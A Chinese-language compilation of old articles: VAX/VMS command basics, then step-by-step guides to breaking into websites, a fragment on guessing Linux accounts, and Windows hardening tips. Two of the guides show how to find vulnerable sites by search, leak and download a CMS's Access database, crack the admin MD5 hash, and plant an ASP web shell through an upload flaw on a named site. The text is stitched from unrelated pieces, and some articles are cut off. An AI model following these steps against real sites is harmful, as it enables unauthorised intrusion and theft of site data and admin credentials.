DEFAULT -目录路径和驱动程序。
DEVICES -系统驱动程序。
INTRUSION -系统账号被破解。
MEMORY -资源内存
NETWORK -网络和VAX内的特定区域,
PROCESS -程序名显示个人标识。
PROTECTION -保护文件。
QUOTA -显示你账号内的磁盘空间。
SYSTEM -各种各样系统的信息。
DAY -日期。
TIME -时间。
USERS -系统的所有用户。
TYPE -显示发送到终端的文件内容。
EX:TYPE DAVID.TXT;3
SET命令:
SET命令是用途很广的命令。它在VMS的5级DCL程序中是万能的命令。
VT:SET FILE/PROTECTION:
我建议应该更多更频繁的使用SET命令有关的保护选项。那些保护命令,如我们熟悉的SOGW或UIC
保护命令,都能够放在任何可以执行或者写入的文件或目录。设置这些保护也包括能够在VAX系统内
读,写,执行或者删除你的文件或目录的不同用户。这个文件也保护那些被用来设置这个选项的。
有一个例子是:
SET FILE/PROTECTION=OWNER:E david.exe;4
如果你在DCL程序中显示这个命令是为了调用DAVID.EXE;4这个程序的话,那么文件的属主将做不
了对这个文件除了执行命令外的任何其他命令。无论如何,下一个例子如下:
SET FILE/PROTECTION=OWNER:RWED david.exe;4
你将能够按“R”读,“W”写,“E”执行和“D”删除键来执行程序。类似的命令也可以应用
于目录。只用把上面的文件名替换成目录名就可以了。当正在创建一个目录时,SET命令可以设置成
你不能删除它。前面讲了这么多,因此你应该总结一个公式:“SET PROTECTION OWNER:D
DIRNAME.DIR;1”和“DEL dirname.dir;1”去删除这个目录。
其他的属主,UIC文件保护下面的一些命令。
WORLD -系统内的任何拥护。
GROUP -你所在组当中的所有用户。
OWNER -仅仅你的账号或者匹配的UIC。
SYSTEM -任何一个有SYSPRV的权限或者有8进制UIC的组。
SET TERMINAL:
这是一个我们进入VAX系统非常重要的命令。如果你有一个VT100终端软件。那么你可以用它:
SET TERMINAL/DEVICE_TYPE=VT100
这个附加的终端是可能被设置的,例如:
SET TERMINAL/WIDTH=80 -设置宽度为80。
SET TERMINAL/ADVANCED_VIDEO =设置124X24行。
SET TERMINAL/ANSI_CRT =ANSI设置出口序列。
SET TERMINAL/AUTOBAUD =可能获得更高的比特率。
SET TERMINAL/BROADCAST =使这些信息能够用SEND,MAIL&PHONE命令来发送。
SET TERMINAL/DEVICE_TYPE=VT220 -设置终端由VT220来控制。
SET TERMINAL/ECHO =使得ECHO命令能够从DCL命令行启动。
SET TERMINAL/FULLDUP =使得双方都能满。
SET TERMINAL/HANGUP =如果终端没信息返回的时候账号自动被注销。
SET TERMINAL/INQUIRE -显示终端的驱动程序。
SET TERMINAL/PAGE=43 -设置43行的长度。
SET TERMINAL/TYPE_AHEAD -设置显示头部的功能。
SET TERMINAL/UNKNOWN -被用来显示ASCII的设备。
SET TERMINAL/WRAP =被用来设置特征的保护。
所有上面的用“=”表示的项目比用“-”表示的设置更容易被改变。在前面的设置中是没有一个
设置目录的。
EX:SET TERMINAL/NOECHO
设置默认值(或挂靠VAX系统周围的)
删除VAX周围的DCL,目录的里面和外面,我需要告诉你设置默认值的命令。它有点像UNIX和
MS-DOS/PC-DOS内的CD命令,除了格式与CD命令不同。这个格式是“SET DEFAULT[.SUBDIR]”去进入
子目录,“SET DEFAULT[-]”进入父目录。我将解释一下改变磁盘的使用方法。如果问到,保留吗
烦之外的一些东西,首先,我将在下面显示出一个例子,那时候把这个例子解释给其他人看是件很
没有头脑的事情。
$ DIR (step 1)
PROGRAM.EXE;2 PROGRAM.EXE;1
$ CREATE/DIR example (step 2)
$ DIR (step 3)
EXAMPLE.DIR;1 PROGRAM.EXE;2 PROGRAM.EXE;1
$ SET DEFAULT [.example] (step 4)
$ DIR (step 5)
no files, animals, vegetables, nor minerals error
$ SET DEF [-] (step 6)
$ COPY PROGRAM.EXE;2 [.example] (step 7)
$ SET DEF [.example] (step 8)
$ DIR (step 9)
PROGRAM.EXE;2
$
这些是我做的:
STEP 1: 我试着看这个目录的内容。我发现我在这个目录中有一个第1,2版的PROGRAM.EXE程
序。
STEP 2:我创建了”EXAMPLE.“这个目录,这个目录看上去是不会被人注意的。
STEP 3: 我又一次查看了这个目录,发现这个目录里多了一个目录”EXAMPLE.DIR;1.“。这是一
个刚刚建立的目录,扩展名是“DIR”,所以它是一个目录。
STEP 4: 我用SET DEFAULT命令改变了目录。你必须使用这种格式去进入子目录。
STEP 5: 我又一次查看了这个目录,这次我的目录里什么资源都没有。如果你对一个空目录输
入DIR的时候将会出现一个错误。
STEP 6:这个命令是用来进入到上一层父目录的。还记得父目录包含的 ”EXAMPLE.DIR;1,“目录
吗?这个DEFAULT选项可以被缩写成DEF。
STEP 7:在这里我将举例说明怎样来移动程序。我刚才拷贝了一个PROGRAM.EXE;2的程序到
EXAMPLE目录内了。
STEP 8:请看第三步
STEP 9:我又一次输入了DIR命令查看我的EXAMPLE.DIR;1内的内容了。发现PROGRAM.EXE;2已经在
我的这个目录内了。
如果你现在还不懂基本的VAX命令,那你就下去吧!
有时候你会进入一个大目录,这里有很多很好的东西能够帮助你不至于犯下一个而浪费了很多时
间。
ADA ADA编辑器资源编码文件
BAS BASIC编辑器资源编码文件
B32 BLISS-32编辑器资源编码文件
C C编辑器资源编码文件
COB COBAL编辑器资源编码文件
FOR FORTRAN编辑器资源编码文件
MAR MACRO编辑器资源编码文件
PLI PL/I编辑器资源编码文件
CLD DCL命令描述文件
COM DCL批处理或者命令程序文件
DAT 日期文件
DIS 分类文件
DIR 目录文件
EDT EDT编辑程序的命令文件
EXE 可执行程序
HLP 文本帮助库
JOU EDT编辑日志文件
LIS 系统列表文件
LOG 批处理输出文件
MAI MAIL信息文件
MEM DSR输出文件
OBJ 对象连接文件
RNO DSR资源文件
SIXEL SIXEL图形文件
SYS 系统图片文件
TJL 当有不寻常事件发生的时候,所产生的日志文件。
TMP 临时文件
TPU 编辑命令文件
TXT 文本输入文件
UAF 用户授权文件
篇6:动力文章系统入侵
作者: 剑三少 转自黑基bbs原创精华版
偶然从某杂志上看到动力文章管理系统有漏洞,特通宵作个试验,想不到还真行了,。。。。。(开工前,请先把Internet选项\\高级选项中的“显示友好HTTP错误信息”前的勾去掉)
1、首先打个baidu搜索了一下,关键字是:动力文章声明,立刻就刷了一大片出来。随便点击一个网站。。。进去了。
2、回到这个网站的主页,随意点开一篇文章,在URL地址最后输入一引号(例如:_blank>1234.net/hacker/bbb.asp?ArticleID=111'),出现了如下信息:
运行时错误 错误 '800a000d'
类型不匹配: 'Clng'
/hacker/Inc/syscode.asp,行44
3、现在再把hacker/Inc/syscode.asp复制进URL的地址中,就变成了:_blank>1234.net/hacker/Inc/syscode.asp,回车后,又出现了错误消息,如下:
Microsoft JET Database Engine 错误 '80004005'
'E:\\my\\1234.net\\hacker\\Inc\\database\\yiuwekdsodksldfslwifds.mdb'不是一个有效的路径。 确定路径名称拼写是否正确,以及是否连接到文件存放的服务器,
/hackerer/Inc/conn.asp,行8
4、随后,再次把database\\yiuwekdsodksldfslwifds.mdb粘贴到URL地址里,变为:_blank>1234.net/hacker/Inc\\database\\yiuwekdsodksldfslwifds.mdb,回车后,奇迹出现了,机器正在下载着什么,对了,就是它的ACCESS数据库,保存着该站几乎所有的数据,当然最主要的当数admin表了,有了它,你就可以控制该站后台了。
5、不过,别急,还有一件事件没做,就是得把下下来的数据库给打开,机器带ACCESS程序的朋友就不用愁了,可一般在网吧可没有什么office之类的。。。。。没关系,网络中什么都有,关键是看你怎么去找啦。。。。用ModifyMdb.exe程序就可把数据库打开,下载地址:_7035.html” target=_blank>www.chinareg.net/SoftView/SoftView_7035.html
(得安装,不过很快)
6、呵呵,等终于把库文件打开了,又一项烦事来了,原来admin表中的password字段值是加密的,别怕,一物降一物,得用上md5.exe了,不过md5是属于暴力型的,假如碰上哪个网管把密码设得有特殊字符或者是很长,那得多等一会了。。。。。
7、。。。。等了半个小时,还好,我弄到的这个密码不是很长,而且都是纯数字,呼呼,上吧,管理员登陆,行了,上去了,我就到后台忙了一阵,不过绝对没搞破坏。。。。。呵呵。。。。
打了这么多字,手有点酸(其实是刚才打CS打的,嘿嘿)。由于这是本人第一次写这种黑术方面的材料,文中难免有些错字和不清楚的地方,希望广大朋友能够谅解,也请大家提点建议,或者有什么不明白的还可以回贴探讨。
有关的原理也不在这里罗嗦了,只要搜一下:爆库,就知道是咋回事了。。。。由于时间仓促,几个截图没弄出来,抱歉,凑合看吧。
篇7:入侵“零度白茶”电影系统
先在baidu或google里搜索关键字“零度白茶”,
这里我已经找好了一个,cccq.net/movie,这次利用的是上传漏洞,所以我们在它后面加个upfile.asp.返回信息“请选择你要上传的图片”。然后打开我们的上传页面。这里我给出它的源码。如下:
encType=multipart/form-data>
rgb(88,88,88) 1px double; BORDER-TOP: rgb(88,88,88) 1px double; FONT-WEIGHT:
normal; FONT-SIZE: 9pt; BORDER-LEFT: rgb(88,88,88) 1px double; LINE-HEIGHT:
normal; BORDER-BOTTOM: rgb(88,88,88) 1px double; FONT-STYLE. normal; FONT-VARIANT:
normal“ type=submit value=上传 name=Submit>
保存为upload.htm
这里的cccq.net/movie/upfile.asp请换成你找到的漏洞站点,
然后随便选择一张图片,找一个asp木马,什么样的asp木马都可以,现在的海洋木马很流行,不过需要注意的是后缀名一定要保存为cer格式的。着里我已经做好了。
接着打开upload.htm第一个框里传图片,第二个传我们的后缀cer的asp木马,接着点上传。
如果上传成功的话,就回出现“图片上传成功! 图片上传成功! ”。看下他的源码。
marginheight=”0“>
图片上传成功!
图片上传成功!
上面的tupian/82111057531.cer就是我们传的asp木马文件了。 然后在IE里输入
cccq.net/movie/tupian/200482111057531.cer 呵呵~~~~~~~~看到什么了?
赶紧输入自己的密码进去玩玩把,千万别搞破坏哦!毕竟学习才是我们的目的。
漏洞解决方法:在upfile.asp里添加 if fileEXT=”asp“ or fileEXT=”asa“
or fileEXT=”aspx“ or fileEXT=”cer“then
代码就可以了!
为避免有些人 ,这个站的漏洞我补了,请换别的站点把!
篇8:跟着 一起入侵Linux系统
我发现了一个网站,于是常规入侵,
跟着 一起入侵Linux系统
,
很好,它的FINGER开着,于是我编了一个SHELL,aaa帐号试到zzz(by the way,这是我发现的一个网上规律,那就是帐号的长度与口令的强度成正比,如果一个帐号只有两三位长,那它的口令一般也很简单,反之亦然,故且称之为若氏
篇9:防止非法入侵 关闭Windows系统各种端口方法
针对windows系统端口的安全,只开放需要的端口,关闭无用系统端口,以获得最大程度减小被攻击的可能性,本文将介绍如何通过组策略和修改系统这两种方法,关闭系统的一些端口,帮助大家防止非法入侵。
Part I. 组策略法
第一步,点击开始,运行,gpedit.msc,双击打开本地安全策略,选中IP安全策略,在本地计算机,在右边窗格的空白位置右击鼠标,在弹出的快捷菜单里选择创建IP安全策略,这样弹出一个向导。在向导中点击下一步按钮,为新的安全策略命名(不重新命名也可以,以下都以未重新命名的为例);再按下一步,显示安全通信请求画面,在画面上把激活默认相应规则左边的钩取消,点击完成按钮就创建了一个新的IP安全策略。
第二步,右击该IP安全策略,在属性对话框中,把使用添加向导左边的钩取消,然后单击添加按钮添加新的规则,随后弹出新规则属性对话框。在对话框中点击添加按钮,弹出IP筛选器列表窗口;在列表中,同样把使用添加向导左边的钩取消掉,然后再点击右边的添加按钮添加新的筛选器。
第三步,进入了筛选器属性对话框,首先看到的是寻址,源地址选任何IP地址,目标地址选我的IP地址;点击协议选项卡,在选择协议类型的下拉列表中选择TCP,然后在到此端口下的文本框中输入135,点击确定按钮,这样就添加了一个屏蔽TCP135(RPC)端口的筛选器,它可以防止外界通过 135端口连上你的电脑。点击确定后回到筛选器列表的对话框,可以看到已经添加了一条策略。重复以上步骤继续添加TCP137、139、445、593 端口和UDP135、139、445 端口,也可继续添加TCP1025、2745、3127、6129、3389 端口的屏蔽策略为它们建立相应的筛选器。最后点击确定按钮。
第四步,在新规则属性对话框中,选择新IP 筛选器列表,然后点击其左边的圆圈上加一个点,表示已经激活,接着点击筛选器操作选项卡,在筛选器操作选项卡中,也把使用添加向导左边的钩取消,点击添加按钮,添加阻止操作;在新筛选器操作属性的安全措施选项卡中,选择阻止,然后点击确定。
第五步、进入了新规则属性对话框,点击新筛选器操作,其左边的圆圈会加了一个点,表示已经激活,点击关闭按钮,关闭对话框;最后回到新IP安全策略属性对话框,在新的IP筛选器列表左边打钩,按确定按钮关闭对话框。回到本地安全策略窗口,用鼠标右击新添加的IP安全策略,选择指派。
重新启动后,电脑中上述网络端口就被关闭了,病毒和 再也不能连上这些端口,从而保护了我们的电脑。(有的用户管理员的密码为空,是不好的,这会让人有机可乘。另win9X与win/xp内核不一样,设置也不一样。)
Part II.修改系统方法
winxp查找本地运行了哪些网络服务,令
netstat -an
netstat -ano
查看本地特定端口连接情况
netstat -anp tcp | find ”:1367\"
1.关闭TCP端口25、80、443(SMTP服务,HTTP服务和IIS管理服务(win2000服务相关))
关闭IIS Admin 服务即可!以下服务将随之关闭!
相关服务(World Wide Web Publishing Service ;Simple Mail Transport Protocol (SMTP))
防止IIS服务再次随系统重新启动的最简单办法是移除IIS组件,在控制面板中选添加/删除
命令:
net stop iisadmin
2.关闭win2000 server并列事务服务!(Distributed Transaction Coordinator service)
并列事务服务在Windows 2000 server上默认安装和启动并打开了TCP端口3372和一个大于1023的端口
命令
net stop msdtc
3.关闭Windows XP的服务(TCP 5000,UDP 123、500和1900端口):
IPsec services (PolicyAgent)
SSDP Discovery Service (SSDPSRV)
Windows Time (W32Time)
命令:
net stop policyagent
net stop ssdpsrv
net stop w32time
4.关闭137、138、139端口
NetBT使用了UDP 137、138和TCP
139端口,
要关闭这些端口,必须在所有网络适配器(Adapter)上禁用NetBT协议。
方法:
本地连接属性->Internet协议 (TCP/IP)->属性->高级->WINS,禁用TCP/IP上的NetBIOS
用来解析NetBIOS名字的lmhosts服务,也可以停止并禁用
命令:
net stop lmhosts
篇10:windows 2000 释疑三则Windows系统
Windows 2000 Professional(以下简称为Win2000) 以其漂亮的界面、强大的 网络 功能以及高稳定性吸引了许多电脑爱好者,不少朋友迫不及待地安装了Win2000,但在使用中遇到了一些问题,下面,我把一些常见问题的解决办法跟大家交流一下。 一、可以先安装Win200
Windows 2000 Professional(以下简称为Win2000) 以其漂亮的界面、强大的网络功能以及高稳定性吸引了许多电脑爱好者,不少朋友迫不及待地安装了Win2000。但在使用中遇到了一些问题,下面,我把一些常见问题的解决办法跟大家交流一下。
一、可以先安装Win2000,再安装Win98吗?如何恢复Win2000的双启动?
一般安装Win98和Win2000双启动系统的顺序是先装Win98,后装Win2000。可是,有些朋友可能一开始就下定决心只装Win2000,因此格式化C盘后,只安装了Win2000。后来才发现一些硬件驱动程序无法在Win2000下使用,有些软件或游戏无法正常运行,才又想安装Win98和Win2000双启动系统,但却不想重装Win2000和其中的许多应用程序、工具软件,这时,可以采取以下措施:
1.用Win98启动盘启动,在另一个硬盘分区上安装Win98(不能在Win2000中直接安装Win98)。重启系统后,你会发现Win2000的双启动菜单不见了,也无法进入Win2000了,这是因为Win2000的引导系统被Win98取代了,但Win2000并未被破坏,别着急,接下去做。
2.不要格式化Win2000所在分区,在Win98中进入Win2000的安装光盘,运行setup.exe,选择全新安装,安装程序拷贝安装文件后,安装向导将会询问你是重新安装还是修复Win2000,按R选择修复Win2000,接着再按R选择紧急修复。等到安装向导再提问时,退出安装程序。
3.删去硬盘中所有以S字符打头且以S结尾的文件。
重新启动系统,你就又可以使用Win2000了,而且恢复了Win2000的双启动功能,原来Win2000中安装的软件也完好无损!
二、如何在Win2000中禁止程序自启动?
如果你觉得Win2000任务栏右端托盘中的程序太多,无端占用了一些系统资源,想禁止一些程序的自启动,
可是,你无论如何也找不到在Win98中熟悉的“系统配置实用程序”,怎么办呢?这时你可以:
1. 将Win98中SYSTEM文件夹内的MSCONFIG.EXE文件复制到Win2000(安装后的文件夹为WINNT)的SYSTEM文件夹内。
2.运行MSCONFIG.EXE,将出现出错信息,告诉你找不到CONFIG.SYS、AUTOEXEC.BAT、SYSTEM.INI、WIN.INI四个系统文件,因为这些文件是Win98才需要的,Win2000已抛弃了它们,当然找不到啦。你可以不理它,连按四次“确定”,怎么样?看到你熟悉的“系统配置实用程序”对话框了吧!你自己看着办吧!
三、怎样在Win2000启动后再打开外“猫”?
有些外“猫”(例如我的“联想射雕二代56K”),安装好驱动后,如果先启动Win2000,再打开“猫”电源,就无法拨号上网,这是由于Win2000对硬件状态的变化非常敏感所致,系统启动时由于未检测到MODEM,会认为MODEM “不存在”而使连接失败。因此,最好在启动Win2000前先打开这类MODEM的电源。如果出现这种情况,可以: 1.右击“我的电脑”,选“属性”,选“硬件”,选“设备管理器”,右击“端口”,选中“扫描硬件改动”,确认即可。
2.如果已知你的“猫”所占用的端口,例如COM2,也可以在点击“设备管理器”后,双击“端口”,右击“通讯端口(COM2)”,选“扫描硬件改动”,确认即可。
针对有些“猫”,如“实达56K”,你可以先安装一个标准56K“猫”的驱动程序,再安装实达“猫”的驱动程序,最后把标准56K“猫”的驱动程序删掉,以后就可以先开机再打开“猫”的电源,而且每次重新启动系统时,再也不会出现“发现新硬件”那讨厌对话框了。
原文转自:www.ltesting.net
文档为doc格式
